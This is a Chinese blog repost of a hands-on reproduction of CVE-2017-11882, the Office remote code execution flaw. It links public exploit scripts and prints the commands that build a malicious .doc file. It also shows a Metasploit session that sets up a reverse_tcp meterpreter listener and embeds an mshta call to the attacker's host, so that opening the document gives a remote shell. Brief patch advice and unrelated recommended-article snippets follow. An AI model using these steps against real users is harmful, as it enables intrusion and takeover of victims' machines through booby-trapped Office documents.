隐藏17年的Office远程代码执行漏洞(CVE-2017-11882)

最新推荐文章于 2024-08-30 10:54:11 发布
最新推荐文章于 2024-08-30 10:54:11 发布
阅读量112 收藏
点赞数
文章标签: 操作系统 python shell
原文链接:http://www.cnblogs.com/Hi-blog/p/7878054.html
版权

Preface

  这几天关于Office的一个远程代码执行漏洞很流行,昨天也有朋友发了相关信息,于是想复现一下看看,复现过程也比较简单,主要是简单记录下。

  利用脚本Github传送地址 ,后面的参考链接都有成功的比较详细的案例了。

  主要是要用到如图中的两个脚本,example文件夹中有个doc,应该直接打开就能弹计算器了。

影响版本

  • Office 365
  • Microsoft Office 2000   
  • Microsoft Office 2003   
  • Microsoft Office 2007 Service Pack 3
  • Microsoft Office 2010 Service Pack 2
  • Microsoft Office 2013 Service Pack 1
  • Microsoft Office 2016

复现过程

国外最先发布的poc地址:https://github.com/embedi/CVE-2017-11882

这里我们使用的是Ridter师傅改进过的脚本:https://github.com/Ridter/CVE-2017-11882/

生成漏洞doc文件弹计算器

  生成漏洞doc文件,可以弹出计算器如下:(脚本在Github传送地址)

starnight:CVE-2017-11882 starnight$ python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc
[*] Done ! output file >> test.doc <<

  用命令生成test.doc后,用Offcie 2013打开这个文件,可以看到在打开doc文件的时候,弹出计算器。

   除了可以弹计算器外,还能获取shell。

生成漏洞doc文件拿shell

  这里我们参考链接2,使用metasploit,将脚本PS_shell.rb放到metasploit exploit的某个路径下:

  我的kali下的metasploit所在路径是:/usr/share/metasploit-framework, 可以放在如下目录:(这里我们新创建一个new-exps目录存放这个脚本)

root@kali:/usr/share/metasploit-framework/modules/exploits/windows/new-exps# pwd
/usr/share/metasploit-framework/modules/exploits/windows/new-exps
root@kali:/usr/share/metasploit-framework/modules/exploits/windows/new-exps# ls
PS_shell.rb

  这样在启动msf时就能直接使用了:

msf > use exploit/windows/new-exps/PS_shell

  漏洞利用过程:

msf > use exploit/windows/new-exps/PS_shell 
msf exploit(PS_shell) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(PS_shell) > set lhost 192.168.1.102
lhost => 192.168.1.102
msf exploit(PS_shell) > set uripath abc
uripath => abc
msf exploit(PS_shell) > exploit
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.1.102:4444 
msf exploit(PS_shell) > [*] Using URL: http://0.0.0.0:8080/abc
[*] Local IP: http://192.168.1.102:8080/abc
[*] Server started.
[*] Place the following DDE in an MS document:
mshta.exe "http://192.168.1.102:8080/abc"

  从上面可以看出,我们要连接到这个地址:http://192.168.1.102:8080/abc

  我们需要用上面那个脚本重新生成这样一个存在漏洞的doc文件:  

starnight:CVE-2017-11882 starnight$ python Command_CVE-2017-11882.py -c "mshta http://192.168.1.102:8080/abc" -o test.doc
[*] Done ! output file >> test.doc <<

  再用Office打开这个doc,就能拿到meterpreter了:

  OK, 利用过程就这样吧。(右键在新标签页中打开图片查看更清晰哦)

 

  更多手法请参考:

    CVE-2017-11882漏洞复现和利用

 

漏洞修复

(1)下载https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882  更新补丁进行修补
 
(2)开启Windows Update功能,定期对系统进行自动更新

参考

  CVE-2017-11882利用

  CVE-2017-11882的复现、利用技巧以及修复方案

转载于:https://www.cnblogs.com/Hi-blog/p/7878054.html

weixin_30889885
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[系统安全] 十.Windows漏洞利用之SMBv3服务远程代码执行漏洞CVE-2020-0796)及防御详解
杨秀璋的专栏
12-30 5075
系统安全系列作者将深入研究恶意样本分析、逆向分析、攻防实战和Windows漏洞利用等,通过在线笔记和实践操作的形式分享与博友们学习,希望能与您一起进步。前文介绍了MS08-067远程代码执行漏洞CVE-2008-4250),它是Windows Server服务RPC请求缓冲区溢出漏洞,利用445端口。这篇文章将详细讲解SMBv3服务远程代码执行漏洞CVE-2020-0796),攻击者可能利用此漏洞远程无需用户验证,通过发送构造特殊的恶意数据导致在目标系统上执行恶意代码,从而获取机器的完全控制,利用的端口
office2017官方正版
lc331的博客
02-21 2288
office2017官方正版ISO镜像文件 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章,了解一下Markdown的基本语法知识。 新的改变 我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客...
Office CVE-2017-11882本地复现
Jun_ay的博客
11-22 3930
Office CVE-2017-11882本地复现 这两天,office又出名了,CVE-2017-11882成了圈里关注的热点,今office爆出好几个漏洞,从CVE-2017-0199、CVE-2017-8570到现在的CVE-2017-11882,exp也是越来越简单粗暴。 下面,我也来蹭波热度。Step1:万计算器POCPOC GitHub:可以使用国外出现的第一份poc:https
Classic Menu for Office 2010 and 2013(断网破解版)
07-24
Office软件是我们日常办公所必须的软件,随着windows系统的不断升级,office软件也更新换代了,虽然现在的office2010及2013界面十分的华丽,不过对于很多用惯了2003的人来说还是很不方便的,很多功能区上的命令都不知道在哪。这款Classic Menu for Office 2010 and 2013可以帮我们将熟悉的Office 2003菜单和工具栏显示在Office 2010和2013中。 软件介绍: 微软Office 2010/2013的最新特性及命令,都能在这个经典界面中找到。2010/2013的功能区选项卡亦全部保留,经典界面和最新的功能区界面,尽在您手。 我们还提供完全免费、没有任何限制的家庭学生版供您使用(详见下面的"对比"), 无需费力地搜寻破解, 远离盗版, 处处安全! 您是否使用过2003/XP/2000微软Office? 如果您曾使用过2003/XP/2000微软Office,将微软Office升级至2010或2013后,您只需使用本软件,就无须任何学习培训或指导,即可享受2010和2013的各项新功能。如果您还不熟悉微软Office2010/2013,请您仔细阅读菜单,保证一学即通。从此减轻您的学习强度, 提高您的工作效率! 轻松在您企业中全面部署 在企业客户端中部署该软件非常容易,完全不必焦头烂额地寻求任何帮助。 请在此了解如何自动在企业或机构的各客户端中部署Office 2010和2013经典菜单。 安装破解方法: 1、下载解压后,运行OfficeMenu2010.exe安装程序! 2、断开网络,或者用防火墙屏蔽软件访问网络的权限! 3、打开你的Office软件,Word或者Excel都可以,要注意,这个是打开Office,而不是刚刚安装的Classic Menu for Office软件! 4、在officetab addin菜单中选择注册,用下面的序列号注册程序 姓 名: 序 列 号: (解压后可见)
office2016重温经典:Office最新版及历史版本的下载和安装方法
热门推荐
感谢关注-最近在编写开源的自动化测试框架还没整理完
12-20 14万+
Office最新版本- Office 365,0ffice历史版本安装Office 2019,Office 2016,Office 2013,Office 2010,Office 2007,Office 2003,及安装注意事项
CVE-2017-11882漏洞分析
HRBEU
07-29 2016
Mr.Kevin 相关资料及软件在此:链接:https://pan.baidu.com/s/1qi-j3U-O6kH__cLA5O_2JA 密码:hjo1 漏洞复现 POC GitHub:可以使用国外出现的第一份poc:https://github.com/embedi/CVE-2017-11882,不过已经停止更新了。这里我使用:https://github.com/Ridter/CVE-...
Office 远程代码执行漏洞CVE-2017-11882)复现过程
GitChat
04-12 1372
昨天朋友问到我,有搞诈骗的加他 QQ 冒充财务要求转账,该怎么治,我说很简单,绑远控就行了。 于是针对该怎么治诈骗,让文件看起来安全又无害。EXE 可能不会上当,那么 Doc 呢?一份财务对账表?我们深入交流了一下,用了最近不久的 Office 远程代码漏洞,也称 Office 内存破坏漏洞,编号为「CVE-2017-11882」,并且已经成功拿到物理机的 Shell。 于是就有了这篇文章,这篇文...
Office CVE-2017-8570远程代码执行漏洞复现
脚本姑娘
01-12 1359
漏洞影响版本 很尴尬,此页无图 Microsoft Office 2007 Service Pack 3 Microsoft Office 2010 Service Pack 2 (32-bit editions) Microsoft Office 2010 Service Pack 2 (64-bit editions) Microsoft Office 201
CVE-2017-11882漏洞分析报告
黑夜黎明
05-17 1385
漏洞简介: 软件名称及版本:Microsoft Office2016以下 漏洞模块:EQNEDT32.EXE 漏洞编号:CVE-2017-11882 危害等级:高危 漏洞类型:缓冲区溢出 威胁类型:远程 软件简介:    Microsoft Office是微软公司针对Windows操作系统所推出的办公室套装软件,漏洞出现在EQNEDT32.EXE模块中,在Office的安装过程中被默认安装。当插入...
红队系列-网络安全知识锦囊(持续更新)
aming小老弟
11-09 771
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
漏洞分析之CVE-2012-4792(UAF)
4ct10n
06-29 2497
0x00 漏洞简介 20129月,通用漏洞与披露平台发布了一个存在IE浏览器的UAF漏洞。 报告指出:Microsoft Internet Explorer 6至9版本中的mshtml.dll中的CMshtmlEd::Exec函数中存在释放后使用漏洞远程攻击者可利用该漏洞通过特制的网站,执行任意代码。 0x01 测试环境操作系统:Windows XP sp3浏览器:IE 8.00.6
漏洞发展趋势
maoguan121的博客
10-27 286
攻击事件中使用的漏洞和具体的操作系统环境相关,如物理隔离 环境下的内网中,就可能存在没有及时更新补丁或版本的核心系统、数据库、系统和软件,攻击者一旦 进入内网就可以利用这些成熟的漏洞利用代码发起有效的攻击。从日志中可以看到,攻击事件的发生不仅会用到近几漏洞,像 EternalBlue、Tomcat 远程代码 执行这样好用的 Nday 漏洞也是黑客手中的利器,一些历史悠久的 SQL注入、拒绝服务类型的漏洞,由 于攻击门槛低,效果显著,攻击者依然在大量使用,使用到的漏洞份分布情况如图 2.3 所示。
Docker容器技术
LongHongYu908的博客
08-29 427
Docker之父Docker就好比传统的货运集装箱。
虚拟机Linux(Centos7)系统静态IP设置
最新发布
BQ Blog
08-30 268
这篇博客介绍了在虚拟机中配置Linux系统的静态IP地址的方法,适用于通过DHCP获取IP地址导致频繁更换IP的情况。首先,用户需要将虚拟机的网络模式更改为NAT模式,并在虚拟机网络编辑器中记录子网IP、子网掩码和网关。然后,编辑相应的网络配置文件,将网络协议更改为静态,并手动设置静态IP地址、子网掩码、网关和DNS。最后,重启网络服务并验证配置是否生效。
Linux磁盘管理
张刚的博客
08-27 427
LVM创建,扩容磁盘,linux扩容系统盘,linux磁盘管理,linux新建分区,linux格式化分区
ARM/Linux嵌入式面经(二七):韶音
叫好与叫座虽然不是对立面,但想在同一个作品中达到双重效果很难。
08-23 302
二面 7月16日 技术面RT-Thread是一个源码公开、可配置的实时操作系统(RTOS),其核心架构设计为微内核结构,支持多任务调度、同步、通信等功能。RT-Thread的调度机制是其核心功能之一,它确保了任务(线程)能够按照预定的优先级和规则有序执行
操作系统原子操作
zzt_is_me的博客
08-28 3462
所谓的原子操作就是不可被拆分的操作,对于多线程对全局变量进行操作时,就再也不用再线程锁了,和pthread_mutex_t保护作用是一样的,也是线程安全的,有些编译器在使用时需要加-march=i686编译参数。2、type只能是整数相关的类型,浮点型和自定义类型无法使用。功能:把value赋值给*ptr,并返回*ptr的旧值。功能:以上操作返回的是*ptr与value计算后的值。使用原子操作实现一个线程安全的无锁队列。1、该功能并不通用,有些编译器不支持。功能:以上操作返回的是*ptr的旧值。
【亲测有效】linux抓包http协议分析,分析header和body
08-29 79
linux抓包http协议分析,分析header和body
[Meachines] [Medium] SecNotes XSRF跨站请求伪造+SMB-Webshell上传+Linux子系统命令历史记录泄露权限提升
08-29 368
#XSRF跨站请求伪造 #SMB-Webshell上传 #Linux子系统命令历史记录泄露权限提升
Pardus 21 Linux安全漏洞远程代码执行漏洞CVE-2021-38061
Pardus 21 Linux发行版近期遭遇了一起严重的安全漏洞,编号为CVE-2021-38061,这是一个远程代码执行漏洞,即攻击者可以通过网络对系统进行未经授权的代码注入,从而获取系统控制权。此次漏洞发生在Pardus的软件中心...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值